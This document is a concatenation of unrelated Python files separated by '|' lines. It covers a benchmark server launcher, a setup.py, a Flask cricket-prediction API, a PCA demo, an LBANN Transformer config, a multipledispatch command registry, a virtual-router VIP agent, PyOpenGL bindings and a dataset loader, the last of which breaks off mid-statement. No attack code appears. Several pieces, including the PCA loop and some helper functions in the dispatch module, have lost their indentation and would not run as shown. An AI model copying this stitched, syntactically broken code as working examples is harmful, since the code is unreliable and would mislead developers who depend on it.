def start(args, logfile, errfile):
    """Launch the Trinidad server (under JRuby 1.7.8) for the benchmark."""
    helper.set_database_host(args)
    trinidad_cmd = Command(
        "rvm jruby-1.7.8 do bundle exec trinidad --config config/trinidad.yml",
        False,
    )
    return helper.run([trinidad_cmd], logfile, errfile, args.troot)
def stop(logfile, errfile):
    """Terminate any running Trinidad process via the shared helper."""
    return helper.stop('trinidad', logfile, errfile)
|
"""
Copyright (c) 2021 Zakru
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from setuptools import setup
from cenerator import __version__ as cen_ver
# Read the long description from the README. Explicit encoding so the build
# does not depend on the platform's default (e.g. cp1252 on Windows).
with open('README.md', 'r', encoding='utf-8') as f:
    readme = f.read()

setup(
    name='cenerator',
    version=cen_ver,
    author='Zakru',
    url='https://github.com/Zakru/cenerator',
    description='A Minecraft data pack creation utility',
    long_description=readme,
    long_description_content_type='text/markdown',
    project_urls={
        'Source Code': 'https://github.com/Zakru/cenerator',
        'Issue Tracker': 'https://github.com/Zakru/cenerator/issues',
    },
    packages=['cenerator'],
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Programming Language :: Python :: 3',
        'Topic :: Games/Entertainment',
        'Topic :: Software Development :: Libraries',
    ],
)
|
# Copyright 2020 Varun Verma
#
from flask import Flask, render_template, request, jsonify
from src.app_functions import predict_match_result
from src.app_functions import update_team_assignment
from src.app_functions import current_match_prediction
from src.app_functions import update_match_details, update_final_over_details
from src.app_functions import update_predicted_result
from google.cloud import datastore
app = Flask(__name__)
client = datastore.Client()
@app.route('/')
def root():
    """Serve the landing page template."""
    return render_template('index.html')
@app.route('/test/')
def localTest():
    """Serve the test harness page (local development only)."""
    return render_template('test.html')
@app.route('/predictMatchResult', methods = ['POST'])
def match_predict_final_over():
    """Predict the match result from the posted JSON payload."""
    return jsonify(predict_match_result(request.json))
@app.route('/currentMatchPrediction', methods = ['POST'])
def currentMatchPrediction():
    """Return the in-progress match prediction for the posted JSON payload."""
    return jsonify(current_match_prediction(request.json))
@app.route('/test/updateTeamAssignments', methods = ['POST'])
def updateTeamAssignments():
    """Update team assignments from the posted JSON payload."""
    return jsonify(update_team_assignment(request.json))
# API To get Player details
@app.route('/players', methods = ['GET'])
def getPlayerNames():
    """Return the `player_name` projection of every Players entity."""
    player_query = client.query(kind="Players")
    player_query.projection = ["player_name"]
    return jsonify(list(player_query.fetch()))
# API To get Team details
@app.route('/teams', methods = ['GET'])
def getTeamNames():
    """Return the `team_name` projection of every Teams entity."""
    team_query = client.query(kind="Teams")
    team_query.projection = ["team_name"]
    return jsonify(list(team_query.fetch()))
# API To get Current Match details
@app.route('/currentMatchPlayers/<team_type>', methods = ['GET'])
def getCurrentMatchPlayers(team_type):
    """Return the player list for the active match.

    `team_type` selects the second-innings bowling side, batting side, or
    (any other value) the union of both teams' squads.
    """
    def _team_players(team_name):
        # One team's player list, looked up by team name.
        q = client.query(kind="Teams")
        q.add_filter("team_name", "=", team_name)
        return list(q.fetch())[0]['players']

    query = client.query(kind="Matches")
    query.add_filter("active", "=", True)
    match = list(query.fetch())[0]

    if team_type == 'bowling':
        return jsonify(_team_players(match['innings']['innings2']['bowling_team']))
    elif team_type == 'batting':
        return jsonify(_team_players(match['innings']['innings2']['batting_team']))
    else:
        # Union of both squads. (The original had an unreachable duplicate
        # `return jsonify(players)` after this branch; removed.)
        players = []
        players.extend(_team_players(match['team1']))
        players.extend(_team_players(match['team2']))
        return jsonify(players)
# API to get Match Details by ID
@app.route('/matchDetails/<match_id>', methods = ['GET'])
def getMatchDetailsByID(match_id):
    """Return a flat summary of the match entity stored under `match_id`."""
    md = client.get(client.key("Matches", match_id))
    innings1 = md['innings']['innings1']
    innings2 = md['innings']['innings2']
    return {
        'team1': md['team1'],
        'team2': md['team2'],
        'fi_bat': innings1['batting_team'],
        'fi_bol': innings1['bowling_team'],
        'si_bat': innings2['batting_team'],
        'si_bol': innings2['bowling_team'],
        'active': md['active'],
    }
# API to update Match Details
@app.route('/test/matchDetails', methods=['POST'])
def updateMatchDetails():
    """Update stored match details (test endpoint) from the POSTed JSON."""
    return jsonify(update_match_details(request.json))
#API to update match final over stats
@app.route('/test/matchFinalOverDetails', methods=['POST'])
def updateMatchFinalOverDetails():
    """Update the final-over statistics (test endpoint) from the POSTed JSON."""
    return jsonify(update_final_over_details(request.json))
# API to update the predicted result of match
@app.route('/test/updatePredictedResult/<match_id>', methods=['POST'])
def updatePredictedResult(match_id):
    """Recompute and store the predicted result for *match_id*."""
    update_predicted_result(match_id)
    return "Update done"
if __name__ == '__main__':
    # This is used when running locally only. When deploying to Google App
    # Engine, a webserver process such as Gunicorn will serve the app. This
    # can be configured by adding an `entrypoint` to app.yaml.
    # Flask's development server will automatically serve static files in
    # the "static" directory. See:
    # http://flask.pocoo.org/docs/1.0/quickstart/#static-files. Once deployed,
    # App Engine itself will serve those files as configured in app.yaml.
    # NOTE: debug=True must never be enabled on a publicly reachable host.
    app.run(host='localhost', port=8080, debug=True)
|
"""
Created on 31 Jan 2021
Example to show myself that PCA when you don't drop any
dimensions gives you back the same data with the transform,
and show the amount of variance lost with different num
of principal components
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import datasets
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
# load the data
cancer_data = datasets.load_breast_cancer()
cancer = cancer_data['data']
print(f"Shape of data is: {cancer.shape}")
cancer_df = pd.DataFrame(cancer,
columns=cancer_data['feature_names'])
cancer_df.head(3)
# carry out feature scaling
# variables are not similar scales
scaler = StandardScaler()
# fit the scaler
scaler.fit(cancer_df)
# normalise the data - 0 mean, standard deviation 1
cancer_scaled = scaler.transform(cancer)
# use describe to confirm the mean and st dev
pd.DataFrame(cancer_scaled,
columns=cancer_data['feature_names']).describe()
print(f'Cancer dataset has {len(cancer_data.feature_names)} different features')
# try a few different iterations of PCA using different number of
# components
num_pc_iter = [5, 10, 15, 20, 25, 30]
for i, num_pc in enumerate(num_pc_iter, 1): # get enumerate to start at one
# use PCA on the transformed dataset to reduce dimensions
print("*"*30)
print(f"Iteration {i}. \n "
f"Number of principal components to choose: {num_pc}")
pca = PCA(n_components=num_pc)
pca.fit(cancer_scaled)
# transform the data using the num of principal components
transformed_data = pca.transform(cancer_scaled)
transformed_variance = pca.explained_variance_ratio_
# print(f"The original shape of data was {cancer.shape}. \n"
# f"The shape of the new mapped data is {transformed_data.shape} \n")
print(f"Explained {100 * np.cumsum(transformed_variance)[-1]: .2f}% of total variance ")
# map the data back to original space following compression
cancer_re_mapped = pca.inverse_transform(transformed_data)
diff_new_old = cancer_re_mapped - cancer_scaled
print(f"Max sum of differences for features (between newly mapped and original)"
f" {np.max(np.sum(diff_new_old, axis=0)) :.2E} \n")
|
# Author: Andreas Putz
# Copyright (c) 2013, PythonFCST
# License: TBD.
r"""
:mod:`PythonFCST`: Python helpers for OpenFCST
===============================================================================
Documentation is available in the docstrings and in the sphinx documentation.
Contents
--------
The PythonFCST package imports all the functions from the top level modules.
Subpackages
-----------
.. list-table:: `PythonFCST` module structure.
:widths: 10 80 10
:header-rows: 1
* - name
- description
- autoload
* - :mod:`PythonFCST.util`
      - common utilities and classes used by most of the other modules
- yes
* - :mod:`PythonFCST.mesh`
- Mesh generation classes
- yes
* - `VISU`
- Visualisation methods
- yes
* - `interactive/`
- setup of IPython-based shell `isfepy`
-
Prefix convention
-----------------
::
None as yet
Utility tools
-------------
::
TODO --- Todo
Import
------
>>> import PythonFCST as fcst
Inheritance diagram
-------------------
.. inheritance-diagram:: PythonFCST
Package Documentation
---------------------
.. automodule:: util
:members:
:undoc-members:
:show-inheritance:
.. automodule:: mesh
:members:
:undoc-members:
:show-inheritance:
"""
# Package version and hard runtime requirements.
__version__ = '0.0.1'
__requires__ = [
    'scipy',
    'numpy',
]
#__extras_require__ = {PyFCell
# 'app': [
# 'envisage',
# ],
#}
# __all__ = ['misc']
import util
import mesh
import pylab as pl
def pylab_setup():
    """Configure pylab/matplotlib rcParams for LaTeX-styled figures.

    Builds a golden-ratio figure size from a fixed 30 cm width, then
    copies every supported entry of ``params`` into ``pl.rcParams``,
    reporting (instead of setting) keys this matplotlib doesn't know.
    """
    # fig_width_pt = 246.0 (LaTeX \showthe\columnwidth) and the pt->inch
    # factor 1/72.27 were computed but unused; the size below is driven
    # by fig_width_cm instead.
    fig_width_cm = 30.0
    inches_per_cm = 0.393
    golden_mean = (pl.sqrt(5)-1.0)/2.0      # Aesthetic ratio
    fig_width = fig_width_cm*inches_per_cm  # width in inches
    fig_height = fig_width*golden_mean      # height in inches
    fig_size = [fig_width, fig_height]
    params = {
        'backend': 'ps',
        # 'backend': 'svg',
        'axes.labelsize': 24,
        'axes.titlesize': 28,
        # 'text.fontsize': 20,
        'legend.fontsize': 20,
        # 'ticks.font':'Helvetica',
        'xtick.labelsize': 20,
        'ytick.labelsize': 20,
        'text.usetex': True,
        # NOTE(review): list-valued 'text.latex.preamble' is rejected by
        # newer matplotlib (expects one string) — confirm target version.
        'text.latex.preamble': [
            r'\usepackage{siunitx}',   # i need upright \micro symbols, but you need...
            # r'\sisetup{detect-all}', # ...this to force siunitx to actually use your fonts
            r'\usepackage{helvet}',    # set the normal font here
            r'\usepackage{sansmath}',  # load up the sansmath so that math -> helvet
            r'\sansmath'],             # <- tricky! -- gotta actually tell tex to use!
        'figure.figsize': fig_size,
        'font.family': 'sans-serif',
        'font.serif': 'Computer Modern Roman',
        'font.sans-serif': 'Helvetica'
    }
    for key in params:
        # dict.has_key() was removed in Python 3; `in` works on both 2 and 3,
        # as does the parenthesized print call below.
        if key in pl.rcParams:
            pl.rcParams[key] = params[key]
        else:
            print("Your version of matplotlib does not support the parameter " + key)
# Apply the figure/LaTeX rcParams as a side effect of importing the package.
pylab_setup()
# Hello-world script (Spanish: "Hello World, I'm from THIRD C").
print ('Hola Mundo, soy del TERCERO C')
|
"""Configure LBANN experiment with Transformer model."""
import math
import os.path
import lbann
import lbann.models
import lbann.contrib.launcher
from lbann.util import str_list
import dataset
# ----------------------------------------------
# Options
# ----------------------------------------------
# Dataset properties
vocab_size = dataset.vocab_size()          # number of distinct token IDs
sequence_length = dataset.sequence_length  # tokens per encoder/decoder sequence
pad_index = dataset.pad_index              # token ID used for padding
# ----------------------------------------------
# Model
# ----------------------------------------------
def make_model(
    mini_batch_size,
    num_epochs,
    embed_dim,
    num_heads,
    label_smoothing,
):
    """Build the LBANN Transformer training model.

    The single input layer carries two concatenated token-ID sequences
    (source then target); embeddings are shared between the input lookup
    and the output projection (weight tying via `embedding_weights`).

    Args:
        mini_batch_size: samples per mini-batch.
        num_epochs: training epochs.
        embed_dim: embedding / transformer hidden size.
        num_heads: attention heads.
        label_smoothing: smoothing weight in [0, 1); 0 disables it.

    Returns:
        lbann.Model with a non-pad-averaged cross-entropy objective.
    """
    # Embedding weights
    var = 2 / (embed_dim + vocab_size) # Glorot initialization
    embedding_weights = lbann.Weights(
        name='embeddings',
        initializer=lbann.NormalInitializer(standard_deviation=math.sqrt(var)),
    )
    # Input is two sequences of token IDs
    input_ = lbann.Identity(lbann.Input())
    # Get sequences of embedding vectors
    # Note: Scale embeddings by sqrt(embed_dim).
    # Note: Decoder input is shifted right, so embedding for last
    # token isn't needed.
    embeddings_tokens = lbann.Identity(lbann.Slice(
        input_,
        axis=0,
        slice_points=str_list([0, 2*sequence_length-1]),
    ))
    embeddings = lbann.Embedding(
        embeddings_tokens,
        weights=embedding_weights,
        num_embeddings=vocab_size,
        embedding_dim=embed_dim,
        padding_idx=pad_index,
    )
    embeddings = lbann.WeightedSum(
        embeddings,
        scaling_factors=str(math.sqrt(embed_dim)),
    )
    # Split the embedded stream back into encoder and decoder halves.
    embeddings_slice = lbann.Slice(
        embeddings,
        axis=0,
        slice_points=str_list([0, sequence_length, 2*sequence_length-1]),
    )
    encoder_input = lbann.Identity(embeddings_slice)
    decoder_input = lbann.Identity(embeddings_slice)
    # Apply transformer model
    transformer = lbann.models.Transformer(
        hidden_size=embed_dim,
        num_heads=num_heads,
        name='transformer',
    )
    result = transformer(
        encoder_input, sequence_length,
        decoder_input, sequence_length-1,
    )
    # Reconstruct decoder input
    # (transpose=True reuses the embedding matrix as the output projection)
    preds = lbann.ChannelwiseFullyConnected(
        result,
        weights=embedding_weights,
        output_channel_dims=[vocab_size],
        bias=False,
        transpose=True,
    )
    preds = lbann.ChannelwiseSoftmax(preds)
    preds = lbann.Slice(preds, axis=0, slice_points=str_list(range(sequence_length)))
    preds = [lbann.Identity(preds) for _ in range(sequence_length-1)]
    # Count number of non-pad tokens
    label_tokens = lbann.Identity(lbann.Slice(
        input_,
        slice_points=str_list([sequence_length+1, 2*sequence_length]),
    ))
    pads = lbann.Constant(value=pad_index, num_neurons=str(sequence_length-1))
    is_not_pad = lbann.NotEqual(label_tokens, pads)
    num_not_pad = lbann.Reduction(is_not_pad, mode='sum')
    # Cross entropy loss with label smoothing
    label_tokens = lbann.Slice(
        label_tokens,
        slice_points=str_list(range(sequence_length)),
    )
    label_tokens = [lbann.Identity(label_tokens) for _ in range(sequence_length-1)]
    if label_smoothing > 0:
        uniform_label = lbann.Constant(
            value=1/vocab_size,
            num_neurons=str_list([1, vocab_size])
        )
    loss = []
    for i in range(sequence_length-1):
        label = lbann.OneHot(label_tokens[i], size=vocab_size)
        label = lbann.Reshape(label, dims=str_list([1, vocab_size]))
        if label_smoothing > 0:
            # Blend the one-hot target with the uniform distribution.
            label = lbann.WeightedSum(
                label,
                uniform_label,
                scaling_factors=str_list([1-label_smoothing, label_smoothing]),
            )
        loss.append(lbann.CrossEntropy(preds[i], label))
    loss = lbann.Concatenation(loss)
    # Average cross entropy over non-pad tokens
    loss_scales = lbann.Divide(
        is_not_pad,
        lbann.Tessellate(num_not_pad, hint_layer=is_not_pad),
    )
    loss = lbann.Multiply(loss, loss_scales)
    loss = lbann.Reduction(loss, mode='sum')
    # Construct model
    metrics = []
    callbacks = [lbann.CallbackPrint(), lbann.CallbackTimer()]
    return lbann.Model(
        mini_batch_size,
        num_epochs,
        layers=lbann.traverse_layer_graph(input_),
        objective_function=loss,
        metrics=metrics,
        callbacks=callbacks,
    )
# ----------------------------------------------
# Data reader
# ----------------------------------------------
def make_data_reader():
    """Build a Protobuf DataReader that feeds training samples from dataset.py.

    Uses LBANN's generic 'python' reader: sample access is delegated to
    get_train_sample / num_train_samples / sample_dims in the dataset
    module, resolved relative to this file's directory.
    """
    reader = lbann.reader_pb2.DataReader()
    _reader = reader.reader.add()
    _reader.name = 'python'
    _reader.role = 'train'
    _reader.shuffle = True
    _reader.percent_of_data_to_use = 1.0
    _reader.python.module = 'dataset'
    _reader.python.module_dir = os.path.dirname(os.path.realpath(__file__))
    _reader.python.sample_function = 'get_train_sample'
    _reader.python.num_samples_function = 'num_train_samples'
    _reader.python.sample_dims_function = 'sample_dims'
    return reader
# ----------------------------------------------
# Batch script
# ----------------------------------------------
def make_batch_script(model_params, script_params):
    """Assemble the experiment prototext and a launchable batch script.

    Args:
        model_params: kwargs forwarded to make_model().
        script_params: launcher kwargs; must contain 'work_dir', where the
            prototext, checkpoints and weight dumps are written.

    Returns:
        The batch script object from lbann.contrib.launcher.
    """
    # Create LBANN objects
    trainer = lbann.Trainer()
    model = make_model(**model_params)
    reader = make_data_reader()
    # Optimizer with learning rate schedule
    # Note: Rough approximation of
    #   embed_dim^-0.5 * min(step^-0.5, step*warmup^-1.5)
    # with embed_dim=512 and warmup=4000.
    opt = lbann.Adam(learn_rate=0.0001, beta1=0.9, beta2=0.98, eps=1e-9)
    model.callbacks.append(
        lbann.CallbackDropFixedLearningRate(
            drop_epoch=[1],
            amt=2,
        )
    )
    model.callbacks.append(
        lbann.CallbackDropFixedLearningRate(
            drop_epoch=[2,4,8,12],
            amt=0.75,
        )
    )
    # Checkpoint after every epoch
    trainer.callbacks.append(
        lbann.CallbackCheckpoint(
            checkpoint_dir=os.path.join(script_params['work_dir'], 'checkpoint'),
            checkpoint_epochs=1,
        )
    )
    # Dump weights after every epoch
    model.callbacks.append(
        lbann.CallbackDumpWeights(
            basename=os.path.join(script_params['work_dir'], 'weights'),
            epoch_interval=1,
        )
    )
    # Create Protobuf file
    protobuf_file = os.path.join(script_params['work_dir'], 'experiment.prototext')
    lbann.proto.save_prototext(
        protobuf_file,
        trainer=trainer,
        model=model,
        data_reader=reader,
        optimizer=opt,
    )
    # Create batch script
    script = lbann.contrib.launcher.make_batch_script(
        **script_params,
    )
    script.add_command('echo "Started training at $(date)"')
    script.add_parallel_command([
        lbann.lbann_exe(),
        f'--prototext={protobuf_file}',
    ])
    # Propagate the training run's exit status out of the batch job.
    script.add_command('status=$?')
    script.add_command('echo "Finished training at $(date)"')
    script.add_command('exit ${status}')
    return script
|
from argparse import ArgumentParser # use traditional argparse instead hiargparse
from hiargparse import ArgsProvider, Arg, ChildProvider # need to define child arguments
from hiargparse import Namespace # wrapper for argparse.Namespace
# just same as example.py
from example import Son
if __name__ == '__main__':
    # set a root argument provider (same as other argument providers)
    args_provider = ArgsProvider(
        args=[Arg(name='foo', default='bar')],
        child_providers=[ChildProvider(Son)]
    )
    # quite usual argparse way
    parser = ArgumentParser()
    parser.add_argument('-V', '--version', action='version', version='v1.0')
    # here we have to write some weird code
    # invoke args_provider's method with the parser
    # instead of parser's method with the args_provider
    args_provider.add_arguments_to_parser(parser)
    # parse_args with original parser
    # in a typical case, this line hides behind other libraries' implementation
    params = parser.parse_args()
    # convert argparse.Namespace to hiargparse.Namespace
    params = Namespace(params)
    # do some deferred actions relating to arg propagation
    args_provider.apply_propagations(params)
    # now you have ALL parameters including child and grandchild arguments
    # please try to execute with --help
    print(params.foo)
    son = Son(params.Son)
    son.print_()
|
from __future__ import annotations
import collections
import inspect
import pathlib
from typing import Any
from typing import Callable
from typing import Dict
from typing import List
from typing import Tuple
from typing import TypeVar
from typing import cast
from multipledispatch.dispatcher import Dispatcher
from multipledispatch.dispatcher import str_signature
# Type variable for the functions wrapped by the @command decorator.
F = TypeVar('F', bound=Callable[[], Any])
# Global registry: command name -> Command dispatcher.
_commands: Dict[str, Command] = {}
def command(
    name: str | None = None,
    schema: dict | None = None,
) -> Callable[[F], Command]:
    """Define a new command.

    Returns a decorator that replaces the decorated function with a
    freshly registered Command (a multipledispatch Dispatcher) carrying
    *schema*. The function's own body is discarded — only its __name__
    is used when *name* is not given.

    Raises:
        Exception: if a command with the same name is already defined.
    """
    def _(func: F) -> Command:
        _name = func.__name__ if name is None else name
        if _name in _commands:
            raise Exception(f"{_name!r} is already defined.")
        _commands[_name] = Command(_name)
        _commands[_name].schema = schema or {}
        return _commands[_name]
    # Cast to the declared return type; the original `cast(Command, _)`
    # disagreed with the annotation above. Annotations `str = None` /
    # `dict = None` are also fixed to explicit optionals.
    return cast(Callable[[F], Command], _)
class Command(Dispatcher):
    """A named multipledispatch Dispatcher with a validation schema."""
    # JSON-schema-like dict attached by the @command decorator.
    schema: dict
    def register(
        self,
        *signature_types,
        schema=None,
    ) -> Callable[[F], Command]:
        """Return a decorator registering an implementation for the types.

        When *signature_types* is empty, the types are inferred from the
        function's positional parameter annotations.

        NOTE(review): the *schema* keyword is accepted but never used in
        this body — confirm whether per-implementation schemas were
        intended to be stored.
        """
        def _(func: F) -> Command:
            types = signature_types or tuple(_find_func_types(func))
            self.add(types, func)
            return self
        return cast(Command, _)
    def __getitem__(self, types):
        """Return the implementation dispatched for *types*.

        Raises:
            NotImplementedError: if no registered signature matches.
        """
        types = types if isinstance(types, tuple) else (types,)
        func = self.dispatch(*types)
        if not func:
            raise NotImplementedError(
                f"Could not find signature for {self.name}: "
                f"<{str_signature(types)}>"
            )
        return func
    def print_methods(self, *args, **kwargs) -> None:
        """Print all of this command's methods in resolution order."""
        if args:
            # Find method by given args.
            args = tuple([type(arg) for arg in args])
            func = self.dispatch(*args)
        else:
            func = None
        base = pathlib.Path().resolve()
        arg_names = _extend_duplicate_names(self.ordering)
        print('---')
        for args in self.ordering:
            func_ = self.funcs[args]
            # Mark the entry that would be dispatched for the given args.
            mark = func_ is func
            _print_method(base, func_, self.name, arg_names, args, mark)
def _extend_duplicate_names(
argslist: List[Tuple[type]]
) -> Dict[type, str]:
argnames = collections.defaultdict(set)
for args in argslist:
for arg in args:
name = arg.__name__
argnames[name].add(arg)
for i in range(10):
found = False
for name in list(argnames):
if len(argnames[name]) == 1:
continue
found = True
n = name.count('.') + 1
args = argnames.pop(name)
for arg in args:
name = arg.__module__.split('.')[-n:] + [arg.__name__]
name = '.'.join(name)
argnames[name].add(arg)
if not found:
break
return {next(iter(v)): k for k, v in argnames.items()}
def _print_method(base, func, name, argnames, args, mark=False):
file = inspect.getsourcefile(func)
line = inspect.getsourcelines(func)[1]
try:
file = pathlib.Path(file).relative_to(base)
except ValueError:
# If two paths do not have common base, then fallback to full
# file path.
pass
argsn = ', '.join([argnames[arg] for arg in args])
signature = f'{name}({argsn}):'
marker = ' * ' if mark else ' '
print(f'{marker}{signature:<60} {file}:{line}')
def _find_func_types(func):
sig = inspect.signature(func)
kinds = {
inspect.Parameter.POSITIONAL_ONLY,
inspect.Parameter.POSITIONAL_OR_KEYWORD,
}
for param in sig.parameters.values():
if param.kind not in kinds or param.annotation is param.empty:
break
yield param.annotation
|
'''
@author: frank
'''
from virtualrouter import virtualrouter
from zstacklib.utils import http
from zstacklib.utils import jsonobject
from zstacklib.utils import linux
from zstacklib.utils import log
from zstacklib.utils import lock
# Module-level logger for this agent plugin.
logger = log.get_logger(__name__)
class VipTO(object):
    """Transfer object describing one virtual IP (fields filled from JSON)."""

    def __init__(self):
        # All fields default to None until the deserializer populates them.
        self.ip = None
        self.netmask = None
        self.gateway = None
        self.ownerEthernetMac = None
class CreateVipCmd(virtualrouter.AgentCommand):
    """Agent command carrying the list of VIPs to create."""
    def __init__(self):
        super(CreateVipCmd, self).__init__()
        # List of VipTO entries; populated by the JSON deserializer.
        self.vips = None
class CreateVipRsp(virtualrouter.AgentResponse):
    """Empty success/failure response for CreateVipCmd."""
    def __init__(self):
        super(CreateVipRsp, self).__init__()
class RemoveVipCmd(virtualrouter.AgentCommand):
    """Agent command carrying the list of VIPs to remove."""
    def __init__(self):
        super(RemoveVipCmd, self).__init__()
        # List of VipTO entries; populated by the JSON deserializer.
        self.vips = None
class RemoveVipRsp(virtualrouter.AgentResponse):
    """Empty success/failure response for RemoveVipCmd."""
    def __init__(self):
        super(RemoveVipRsp, self).__init__()
class Vip(virtualrouter.VRAgent):
    """Virtual-router agent that creates and removes virtual IPs over HTTP."""
    VR_CREATE_VIP = "/createvip"
    VR_REMOVE_VIP = "/removevip"
    @virtualrouter.replyerror
    @lock.lock('vip')
    def remove_vip(self, req):
        """Remove every VIP in the request body via linux.delete_vip_by_ip_if_exists."""
        cmd = jsonobject.loads(req[http.REQUEST_BODY])
        for vip in cmd.vips:
            linux.delete_vip_by_ip_if_exists(vip.ip)
            logger.debug('removed vip %s' % jsonobject.dumps(vip))
        rsp = RemoveVipRsp()
        return jsonobject.dumps(rsp)
    @virtualrouter.replyerror
    @lock.lock('vip')
    def create_vip(self, req):
        """Create every VIP in the request body via linux.create_vip_if_not_exists."""
        cmd = jsonobject.loads(req[http.REQUEST_BODY])
        for vip in cmd.vips:
            linux.create_vip_if_not_exists(vip.ownerEthernetMac, vip.ip, vip.netmask)
            logger.debug('created vip %s' % jsonobject.dumps(vip))
        rsp = CreateVipRsp()
        return jsonobject.dumps(rsp)
    def start(self):
        """Register both async endpoints on the shared HTTP server."""
        virtualrouter.VirtualRouter.http_server.register_async_uri(self.VR_CREATE_VIP, self.create_vip)
        virtualrouter.VirtualRouter.http_server.register_async_uri(self.VR_REMOVE_VIP, self.remove_vip)
    def stop(self):
        """No resources to release."""
        pass
|
import pytest
import numpy as np
from solarforecastarbiter.metrics import summary
@pytest.mark.parametrize("ts", [
[1, 2, 3],
np.random.rand(10),
np.random.rand(1000),
])
def test_scalar(ts):
for metric in summary._MAP:
f = summary._MAP[metric][0]
assert np.isscalar(f(ts))
|
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
# Extension identifier (autogenerated file — see header note; do not edit).
_EXTENSION_NAME = 'GL_APPLE_vertex_array_range'
def _f( function ):
    # Wrap a raw entry point with platform loading and standard error checking.
    return _p.createFunction( function,_p.PLATFORM.GL,'GL_APPLE_vertex_array_range',error_checker=_errors._error_checker)
# Enum constants defined by this extension.
GL_STORAGE_CACHED_APPLE=_C('GL_STORAGE_CACHED_APPLE',0x85BE)
GL_STORAGE_CLIENT_APPLE=_C('GL_STORAGE_CLIENT_APPLE',0x85B4)
GL_STORAGE_SHARED_APPLE=_C('GL_STORAGE_SHARED_APPLE',0x85BF)
GL_VERTEX_ARRAY_RANGE_APPLE=_C('GL_VERTEX_ARRAY_RANGE_APPLE',0x851D)
GL_VERTEX_ARRAY_RANGE_LENGTH_APPLE=_C('GL_VERTEX_ARRAY_RANGE_LENGTH_APPLE',0x851E)
GL_VERTEX_ARRAY_RANGE_POINTER_APPLE=_C('GL_VERTEX_ARRAY_RANGE_POINTER_APPLE',0x8521)
GL_VERTEX_ARRAY_STORAGE_HINT_APPLE=_C('GL_VERTEX_ARRAY_STORAGE_HINT_APPLE',0x851F)
# ctypes stubs for the extension's entry points (bodies replaced at load time).
@_f
@_p.types(None,_cs.GLsizei,ctypes.c_void_p)
def glFlushVertexArrayRangeAPPLE(length,pointer):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLint)
def glVertexArrayParameteriAPPLE(pname,param):pass
@_f
@_p.types(None,_cs.GLsizei,ctypes.c_void_p)
def glVertexArrayRangeAPPLE(length,pointer):pass
|
import torch
import torchvision.transforms as transforms
import torch.utils.data as data
import torch.nn.functional as F
import functools
from PIL import Image
import os
import os.path
import numpy as np
from numpy import linalg as LA
import csv
import pandas as pd
import pickle
def make_dataset(dir, csv_file='/scratch/ainaz/OASIS/OASIS_trainval/OASIS_val.csv',
                 base='/scratch/ainaz'):
    """Read the OASIS validation CSV and return [image, normal, mask] path triples.

    Args:
        dir: kept for interface compatibility with existing callers; the
            file list is driven by *csv_file*, not this argument.
            NOTE(review): the original ignored it too — confirm intent.
        csv_file: CSV with 'Image', 'Normal' and 'Mask' columns holding
            paths relative to *base*. Defaults preserve the original
            hard-coded location.
        base: directory the relative paths are joined against.

    Returns:
        List of [image_path, normal_path, mask_path] lists.
    """
    d = pd.read_csv(csv_file)
    return [
        [os.path.join(base, img), os.path.join(base, normal), os.path.join(base, mask)]
        for img, normal, mask in zip(d['Image'], d['Normal'], d['Mask'])
    ]
def rgb_normal_mask_loader(path):
    """Load one (rgb, normal, mask) sample triple.

    Args:
        path: [rgb_path, normal_path, mask_path] as produced by make_dataset.

    Returns:
        Tuple of (rgb ndarray, unpickled normal object, mask ndarray).

    NOTE(review): pickle.load is unsafe on untrusted files — confirm the
    provenance of the normal pickles.
    """
    rgb_path, normal_path, mask_path = path
    rgb = np.array(Image.open(rgb_path))
    with open(normal_path, 'rb') as f:
        normal = pickle.load(f)
    mask = np.array(Image.open(mask_path))
    return rgb, normal, mask
# Shared PIL/ndarray -> tensor conversion.
to_tensor = transforms.ToTensor()
# Per-channel normalization statistics, shaped (3,1,1) for broadcasting.
RGB_MEAN = torch.Tensor([0.55312, 0.52514, 0.49313]).reshape(3,1,1)
RGB_STD = torch.Tensor([0.20555, 0.21775, 0.24044]).reshape(3,1,1)
class OASISDataset(data.Dataset):
    """OASIS surface-normal dataset: yields (rgb, normal, mask) tensor triples."""
    def __init__(self, root, output_size, normalized=False):
        """
        Args:
            root: passed to make_dataset (which currently ignores it).
            output_size: target size for the Resize transforms.
            normalized: if True, append RGB mean/std normalization.
        """
        imgs = make_dataset(root)
        # NOTE(review): im[1] is a path string, never == 1, so this always
        # prints 0 — looks like leftover debug output.
        print(len([im for im in imgs if im[1] == 1]))
        assert len(imgs) > 0, "Found 0 images in subfolders of: " + root + "\n"
        # NOTE(review): `type` here is the builtin, so this prints
        # "<class 'type'>" — a folder name was probably intended.
        print("Found {} images in {} folder.".format(len(imgs), type))
        self.root = root
        self.imgs = imgs
        self.output_size = output_size
        self.transform_rgb = transforms.Compose([
            transforms.ToPILImage(),
            transforms.Resize(self.output_size, Image.BILINEAR),
            transforms.ToTensor()])
        if normalized:
            self.transform_rgb = transforms.Compose(
                self.transform_rgb.transforms + [transforms.Normalize(mean=RGB_MEAN, std=RGB_STD)]
            )
        # Normals/masks use nearest-neighbor resize to avoid interpolation.
        self.transform_normal = transforms.Compose([
